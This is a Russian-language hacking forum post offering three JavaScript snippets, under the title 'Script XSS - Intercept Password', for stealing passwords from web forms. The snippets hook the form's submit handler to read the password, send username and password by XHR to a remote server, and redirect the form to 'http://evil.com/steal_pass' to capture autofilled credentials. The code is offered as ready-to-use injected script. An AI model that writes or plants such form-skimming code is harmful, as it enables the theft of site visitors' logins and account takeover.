Что нового

Script XSS - Intercept Password

Vander 0

Vander

Команда форума
10.11.2019
491
1 128
hacking-windows-10-intercept-decrypt-windows-passwords-local-network.1280x600.jpg

Три скрипта, которые демонстрируют разные способы кражи пароля из веб-форм.
  • Базовый сценарий, который использует атрибут «onsubmit» объекта «form» Javascript для перехвата и использования значений, установленных в форме.
  • Другой, который крадет пароль от автозаполнения и отправляет данные на вредоносный URL.
  • Последний использует XHR для отправки данных на сторонний сервер
Код:
/*** Method 1 ***/
function intercept () {
    var password = document.forms[0].elements[1].value;
    /* do whatever you want with "password" */
}
document.forms[0].onsubmit = intercept;


/*** Method 2 ***/
var user = document.forms[0].elements[0].value;
var pass = document.forms[0].elements[1].value;
 
window.setTimeout( function () {
    var request = new XMLHttpRequest();
    request.open("GET", "http://localhost:8000/?user="+user+"&pass="+pass, true);
    request.send()
}, 5000);



/*** Method 3 ***/
/* stealing from auto-complete */
window.setTimeout(function () {
document.forms[0].action = "http://evil.com/steal_pass";
document.forms[0].submit();
}, 10000);
 
Верх Низ